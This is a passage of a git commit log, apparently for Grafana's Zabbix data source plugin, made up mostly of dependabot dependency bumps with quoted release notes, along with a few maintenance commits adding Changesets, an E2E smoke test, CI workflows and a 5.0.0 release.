Bumps [dompurify](https://github.com/cure53/DOMPurify) from 3.1.6 to 3.2.4. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/cure53/DOMPurify/releases">dompurify's releases</a>.</em></p> <blockquote> <h2>DOMPurify 3.2.4</h2> <ul> <li>Fixed a conditional and config dependent mXSS-style <a href="https://nsysean.github.io/posts/dompurify-323-bypass/">bypass</a> reported by <a href="https://github.com/nsysean"><code>@nsysean</code></a></li> <li>Added a new feature to allow specific hook removal, thanks <a href="https://github.com/davecardwell"><code>@davecardwell</code></a></li> <li>Added <em>purify.js</em> and <em>purify.min.js</em> to exports, thanks <a href="https://github.com/Aetherinox"><code>@Aetherinox</code></a></li> <li>Added better logic in case no window object is president, thanks <a href="https://github.com/yehuya"><code>@yehuya</code></a></li> <li>Updated some dependencies called out by dependabot</li> <li>Updated license files etc to show the correct year</li> </ul> <h2>DOMPurify 3.2.3</h2> <ul> <li>Fixed two conditional sanitizer bypasses discovered by <a href="https://github.com/parrot409"><code>@parrot409</code></a> and <a href="https://x.com/slonser_"><code>@Slonser</code></a></li> <li>Updated the attribute clobbering checks to prevent future bypasses, thanks <a href="https://github.com/parrot409"><code>@parrot409</code></a></li> </ul> <h2>DOMPurify 3.2.2</h2> <ul> <li>Fixed a possible bypass in case a rather specific config for custom elements is set, thanks <a href="https://github.com/yaniv-git"><code>@yaniv-git</code></a></li> <li>Fixed several minor issues with the type definitions, thanks again <a href="https://github.com/reduckted"><code>@reduckted</code></a></li> <li>Fixed a minor issue with the types reference for trusted types, thanks <a href="https://github.com/reduckted"><code>@reduckted</code></a></li> <li>Fixed a minor problem with the template detection regex on some systems, thanks <a href="https://github.com/svdb99"><code>@svdb99</code></a></li> </ul> <h2>DOMPurify 3.2.1</h2> <ul> <li>Fixed several minor issues with the type definitions, thanks <a href="https://github.com/reduckted"><code>@reduckted</code></a> <a href="https://github.com/ghiscoding"><code>@ghiscoding</code></a> <a href="https://github.com/asamuzaK"><code>@asamuzaK</code></a> <a href="https://github.com/MiniDigger"><code>@MiniDigger</code></a></li> <li>Fixed an issue with non-minified dist files and order of imports, thanks <a href="https://github.com/reduckted"><code>@reduckted</code></a></li> </ul> <h2>DOMPurify 3.2.0</h2> <ul> <li>Added type declarations, thanks <a href="https://github.com/reduckted"><code>@reduckted</code></a> , <a href="https://github.com/philmayfield"><code>@philmayfield</code></a>, <a href="https://github.com/aloisklink"><code>@aloisklink</code></a>, <a href="https://github.com/ssi02014"><code>@ssi02014</code></a> and others</li> <li>Fixed a minor issue with the handling of hooks, thanks <a href="https://github.com/kevin-mizu"><code>@kevin-mizu</code></a></li> </ul> <h2>DOMPurify 3.1.7</h2> <ul> <li>Fixed an issue with comment detection and possible bypasses with specific config settings, thanks <a href="https://github.com/masatokinugawa"><code>@masatokinugawa</code></a></li> <li>Fixed several smaller typos in documentation and test & build files, thanks <a href="https://github.com/christianhg"><code>@christianhg</code></a></li> <li>Added better support for Angular compiler, thanks <a href="https://github.com/jeroen1602"><code>@jeroen1602</code></a></li> <li>Added several new attributes to HTML and SVG allow-list, thanks <a href="https://github.com/Gigabyte5671"><code>@Gigabyte5671</code></a> and <a href="https://github.com/Rotzbua"><code>@Rotzbua</code></a></li> <li>Removed the <code>foreignObject</code> element from the list of HTML entry-points, thanks <a href="https://github.com/masatokinugawa"><code>@masatokinugawa</code></a></li> <li>Bumped several dependencies to be more up to date</li> </ul> </blockquote> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
Zoltán Bedi
|
aa63bb8835 |
Add Changesets configuration and update development documentation (#1964)
Introduce Changesets for versioning and changelog generation, and enhance development documentation to guide contributors on using Changesets effectively. |
||
Gareth Dawson
|
525217ddad |
Add E2E smoke test (#1962)
creates a smoke test for the zabbix data source closes https://github.com/grafana/data-sources/issues/194 |
||
Ivana Huckova
|
25354eea40 |
Release version 5.0.0: plugin now requires Grafana 10.4.8+ (#1945)
Changes: - Use 10.4.8 as minimal supported Grafana version in plugins that previously supported v9. - Bump version to 5.0.0 as we are changing min supported Grafana version |
||
Sriram
|
88b732e062 |
github actions workflows added (#1947)
* github actions workflows added * added playwright tests * Apply suggestions from code review * Update .github/workflows/push.yaml |
||
|
dependabot[bot]
|
0225320a62 |
Bump nanoid from 3.3.6 to 3.3.8 (#1933)
Bumps [nanoid](https://github.com/ai/nanoid) from 3.3.6 to 3.3.8. - [Release notes](https://github.com/ai/nanoid/releases) - [Changelog](https://github.com/ai/nanoid/blob/main/CHANGELOG.md) - [Commits](https://github.com/ai/nanoid/compare/3.3.6...3.3.8) --- updated-dependencies: - dependency-name: nanoid dependency-type: indirect ... Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> |
||
Ivana Huckova
|
fa7fca74a4 | Replace @grafana/experimental with @grafana/plugin-ui | ||
|
dependabot[bot]
|
3a2356f2f2 |
Bump cross-spawn from 7.0.3 to 7.0.6 (#1915)
Bumps [cross-spawn](https://github.com/moxystudio/node-cross-spawn) from 7.0.3 to 7.0.6. - [Changelog](https://github.com/moxystudio/node-cross-spawn/blob/master/CHANGELOG.md) - [Commits](https://github.com/moxystudio/node-cross-spawn/compare/v7.0.3...v7.0.6) --- updated-dependencies: - dependency-name: cross-spawn dependency-type: indirect ... Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> |
||
|
Sriram
|
7c8170d242 | updated deps (#1906) | ||
|
dependabot[bot]
|
4ab2236bf3 |
Bump dompurify from 3.1.0 to 3.1.6
Bumps [dompurify](https://github.com/cure53/DOMPurify) from 3.1.0 to 3.1.6. - [Release notes](https://github.com/cure53/DOMPurify/releases) - [Commits](https://github.com/cure53/DOMPurify/compare/3.1.0...3.1.6) --- updated-dependencies: - dependency-name: dompurify dependency-type: indirect ... Signed-off-by: dependabot[bot] <support@github.com> |
||
|
dependabot[bot]
|
35b6f2bfaf |
Bump path-to-regexp from 1.8.0 to 1.9.0
Bumps [path-to-regexp](https://github.com/pillarjs/path-to-regexp) from 1.8.0 to 1.9.0. - [Release notes](https://github.com/pillarjs/path-to-regexp/releases) - [Changelog](https://github.com/pillarjs/path-to-regexp/blob/master/History.md) - [Commits](https://github.com/pillarjs/path-to-regexp/compare/v1.8.0...v1.9.0) --- updated-dependencies: - dependency-name: path-to-regexp dependency-type: indirect ... Signed-off-by: dependabot[bot] <support@github.com> |
||
|
Ivana Huckova
|
64dccad625 |
Merge pull request #1871 from grafana/dependabot/npm_and_yarn/micromatch-4.0.8
Bump micromatch from 4.0.5 to 4.0.8 |
||
|
dependabot[bot]
|
401b96fbfd |
Bump micromatch from 4.0.5 to 4.0.8
Bumps [micromatch](https://github.com/micromatch/micromatch) from 4.0.5 to 4.0.8. - [Release notes](https://github.com/micromatch/micromatch/releases) - [Changelog](https://github.com/micromatch/micromatch/blob/master/CHANGELOG.md) - [Commits](https://github.com/micromatch/micromatch/compare/4.0.5...4.0.8) --- updated-dependencies: - dependency-name: micromatch dependency-type: indirect ... Signed-off-by: dependabot[bot] <support@github.com> |
||
|
dependabot[bot]
|
197f2a17d1 |
Bump webpack from 5.88.2 to 5.94.0
Bumps [webpack](https://github.com/webpack/webpack) from 5.88.2 to 5.94.0. - [Release notes](https://github.com/webpack/webpack/releases) - [Commits](https://github.com/webpack/webpack/compare/v5.88.2...v5.94.0) --- updated-dependencies: - dependency-name: webpack dependency-type: direct:development ... Signed-off-by: dependabot[bot] <support@github.com> |
||
|
dependabot[bot]
|
e490e1023e |
Bump fast-loops from 1.1.3 to 1.1.4 (#1854)
Bumps [fast-loops](https://github.com/robinweser/fast-loops) from 1.1.3 to 1.1.4. - [Commits](https://github.com/robinweser/fast-loops/commits) --- updated-dependencies: - dependency-name: fast-loops dependency-type: indirect ... Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> |
||
|
dependabot[bot]
|
ec3170ebb6 |
Bump ws from 8.14.2 to 8.17.1
Bumps [ws](https://github.com/websockets/ws) from 8.14.2 to 8.17.1. - [Release notes](https://github.com/websockets/ws/releases) - [Commits](https://github.com/websockets/ws/compare/8.14.2...8.17.1) --- updated-dependencies: - dependency-name: ws dependency-type: indirect ... Signed-off-by: dependabot[bot] <support@github.com> |
||
|
dependabot[bot]
|
ae495f4b94 |
Bump braces from 3.0.2 to 3.0.3
Bumps [braces](https://github.com/micromatch/braces) from 3.0.2 to 3.0.3. - [Changelog](https://github.com/micromatch/braces/blob/master/CHANGELOG.md) - [Commits](https://github.com/micromatch/braces/compare/3.0.2...3.0.3) --- updated-dependencies: - dependency-name: braces dependency-type: indirect ... Signed-off-by: dependabot[bot] <support@github.com> |
||
Gábor Farkas
|
ca311781f4 | update deps | ||
|
Sriram
|
c4065fb0f3 |
config updates (#1800)
* cleanup * update create plugin config and query help fix * query types file * Update docker-compose.yml Co-authored-by: Zoltán Bedi <zoltan.bedi@gmail.com> * addressed review comments --------- Co-authored-by: Zoltán Bedi <zoltan.bedi@gmail.com> |
||
|
dependabot[bot]
|
7e18409a0b |
Bump @adobe/css-tools from 4.3.1 to 4.3.2
Bumps [@adobe/css-tools](https://github.com/adobe/css-tools) from 4.3.1 to 4.3.2. - [Changelog](https://github.com/adobe/css-tools/blob/main/History.md) - [Commits](https://github.com/adobe/css-tools/commits) --- updated-dependencies: - dependency-name: "@adobe/css-tools" dependency-type: indirect ... Signed-off-by: dependabot[bot] <support@github.com> |
||
Gareth Dawson
|
17abd468ff | add @grafana/experimental | ||
|
dependabot[bot]
|
5f9e0e5a42 |
Bump @babel/traverse from 7.22.20 to 7.23.2 (#1722)
Bumps [@babel/traverse](https://github.com/babel/babel/tree/HEAD/packages/babel-traverse) from 7.22.20 to 7.23.2. - [Release notes](https://github.com/babel/babel/releases) - [Changelog](https://github.com/babel/babel/blob/main/CHANGELOG.md) - [Commits](https://github.com/babel/babel/commits/v7.23.2/packages/babel-traverse) --- updated-dependencies: - dependency-name: "@babel/traverse" dependency-type: indirect ... Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> |
||
|
dependabot[bot]
|
626864e77c |
Bump postcss from 8.4.14 to 8.4.31 (#1703)
Bumps [postcss](https://github.com/postcss/postcss) from 8.4.14 to 8.4.31. - [Release notes](https://github.com/postcss/postcss/releases) - [Changelog](https://github.com/postcss/postcss/blob/main/CHANGELOG.md) - [Commits](https://github.com/postcss/postcss/compare/8.4.14...8.4.31) --- updated-dependencies: - dependency-name: postcss dependency-type: direct:development ... Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> |
||
|
Gábor Farkas
|
143f39e365 | added prettier | ||
|
Zoltán Bedi
|
74fd93f051 |
Pin jackspeak to 2.1.1
See https://github.com/storybookjs/storybook/issues/22431#issuecomment-1630086092 |
||
|
Zoltán Bedi
|
fdca810285 | Chore: Dependency clean up | ||
Alexander Zobnin
|
b602e15899 | Add spellcheck |